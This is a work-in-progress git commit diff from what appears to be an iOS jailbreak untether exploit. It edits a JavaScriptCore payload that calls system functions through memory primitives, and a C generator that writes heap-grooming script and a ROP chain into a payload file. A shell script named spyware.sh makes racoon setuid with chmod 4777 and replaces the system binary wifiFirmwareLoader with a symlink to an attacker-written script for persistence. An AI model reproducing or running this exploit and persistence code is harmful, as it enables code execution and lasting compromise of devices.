wip

3 files changed, 41 insertions, 65 deletions

diff --git a/js/main.js b/js/main.js
index 7a4a449..efb1f5f 100644
--- a/js/main.js
+++ b/js/main.js
@@ -49,7 +49,7 @@ function main() {
 
 	var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
 	var shc_slide = read_u32(0x1a0000 + 20 + slid);
-	write_str(0x148000, "get rekt from jsc %d\0");
+	write_str(0x148000, "get rekt from jsc %d (slide=%x)\0");
 	write_str(0x149000, "syslog\0");
 	write_str(0x14a000, "sleep\0");
 //	while (true) {
@@ -59,7 +59,7 @@ function main() {
 
 	var i = 0;
 	while (true) {
-		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, 0x3);
+		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
 		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
 		i++;
 //		call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
diff --git a/spyware.sh b/spyware.sh
index fb79486..dac5939 100755
--- a/spyware.sh
+++ b/spyware.sh
@@ -3,7 +3,7 @@
 ssh root@localhost -p 2222 << EOF
 rm -rf /untether/
 mkdir /untether/
-echo "#!/usr/local/bin/scripter -q -cf" > /untether/get_code_exec
+echo "#!/usr/local/bin/scripter_ -q -cf" > /untether/get_code_exec
 echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
 echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
 echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
@@ -32,8 +32,8 @@ echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
 echo "execute(\"/untether/get_code_exec\");" >> /untether/get_code_exec
 chmod +x /untether/get_code_exec
 mkdir /usr/local/bin/
-cp -p /usr/libexec/dhcpd /usr/local/bin/scripter
+cp -p /usr/libexec/dhcpd /usr/local/bin/scripter_
 chmod 4777 /usr/sbin/racoon
-mv /usr/sbin/BTServer /usr/sbin/BTServer_
-ln -s /untether/get_code_exec /usr/sbin/BTServer
+mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_
+ln -s /untether/get_code_exec /usr/libexec/wifiFirmwareLoader
 EOF
\ No newline at end of file
diff --git a/src/main.c b/src/main.c
index 218f6ea..c3df450 100644
--- a/src/main.c
+++ b/src/main.c
@@ -176,7 +176,8 @@ int main(int   argc,
 //	uint32_t	stack_base					= 0x1c7738; // my shell setup
 //	uint32_t	stack_base					= 0x1c7c88; // my 4s shell setup
 //	uint32_t	stack_base					= 0x1c2e48; // my lldb
-	uint32_t	stack_base					= 0x1c7d68; // btserver env
+//	uint32_t	stack_base					= 0x1c7d68; // btserver env
+	uint32_t	stack_base					= 0x1c7dd8; // wifiFirmwareLoader env
 	uint32_t	magic_trigger_addr			= 0xb6074;
 
 	uint32_t	mov_r0_0_bx_lr				= 0x8d3e	| 1;
@@ -297,6 +298,39 @@ int main(int   argc,
 			write32_unslid(0x41414141,
 						   0x42424242));
 #endif
+								
+	fprintf(fp,
+			"%s",
+			writebuf_unslid(0x108000,
+							"var parent = new Uint8Array(0x100);"
+							"var child = new Uint8Array(0x100);"
+							"    var fuck = new Array();"
+							"    for (var i = 0; i < 0x200000; i++) {"
+							"        fuck[i] = i;"
+							"    }"
+							"    delete fuck;"
+							""
+							"//shitalloc();",
+							strlen("var parent = new Uint8Array(0x100);"
+								   "var child = new Uint8Array(0x100);"
+								   "    var fuck = new Array();"
+								   "    for (var i = 0; i < 0x200000; i++) {"
+								   "        fuck[i] = i;"
+								   "    }"
+								   "    delete fuck;"
+								   ""
+								   "//shitalloc();") + 1));
+	fprintf(fp,
+			"%s",
+			writebuf_unslid(0x10a000,
+							js_src,
+							strlen(js_src) + 1));
+	
+	fprintf(fp,
+			"%s",
+			writebuf_unslid(0x109000,
+							"still alive\n",
+							strlen("still alive\n") + 1));
 
 	for (int slide = 0x1; slide <= 0x3; slide++) {
 		uint32_t base = slide << 12;
@@ -320,30 +354,6 @@ int main(int   argc,
 								"[*] malloc(...)\t\t\t= %p\n",
 								strlen("[*] malloc(...)\t\t\t= %p\n") + 1));
 
-
-		fprintf(fp,
-				"%s",
-				writebuf_unslid(base + dyld_status_addr,
-								"[*] dyld_base\t\t\t= %p\n",
-								strlen("[*] dyld_base\t\t\t= %p\n") + 1));
-
-		fprintf(fp,
-				"%s",
-				writebuf_unslid(base + dyld_status2_addr,
-								"[*] *(uint32_t*)dyld_base\t= %p\n",
-								strlen("[*] *(uint32_t*)dyld_base\t= %p\n") + 1));
-
-		fprintf(fp,
-				"%s",
-				writebuf_unslid(base + jsc_addr,
-								"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore",
-								strlen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore") + 1));
-
-		fprintf(fp,
-				"%s",
-				writebuf_unslid(base + dlopen_status_addr,
-								"[*] dlopen(JavaScriptCore)\t= %p\n",
-								strlen("[*] dlopen(JavaScriptCore)\t= %p\n") + 1));
 		fprintf(fp,
 				"%s",
 				writebuf_unslid(base + dyld_shc_status_addr,
@@ -359,40 +369,6 @@ int main(int   argc,
 				writebuf_unslid(base + arg_addr,
 								"/untether/p0laris",
 								strlen("/untether/p0laris") + 1));
-								
-		fprintf(fp,
-				"%s",
-				writebuf_unslid(0x108000,
-								"var parent = new Uint8Array(0x100);"
-								"var child = new Uint8Array(0x100);"
-								"    var fuck = new Array();"
-								"    for (var i = 0; i < 0x800000; i++) {"
-								"        fuck[i] = i;"
-								"    }"
-								"    delete fuck;"
-								""
-								"//shitalloc();",
-								strlen("var parent = new Uint8Array(0x100);"
-									   "var child = new Uint8Array(0x100);"
-									   "    var fuck = new Array();"
-									   "    for (var i = 0; i < 0x800000; i++) {"
-									   "        fuck[i] = i;"
-									   "    }"
-									   "    delete fuck;"
-									   ""
-									   "//shitalloc();") + 1));
-		fprintf(fp,
-				"%s",
-				writebuf_unslid(0x10a000,
-								js_src,
-								strlen(js_src) + 1));
-
-		fprintf(fp,
-				"%s",
-				writebuf_unslid(0x109000,
-								"still alive\n",
-								strlen("still alive\n") + 1));
-								
 
 		rop_chain_shit	chain_b0i	= gen_rop_chain(base,
 													we_out_here_addr,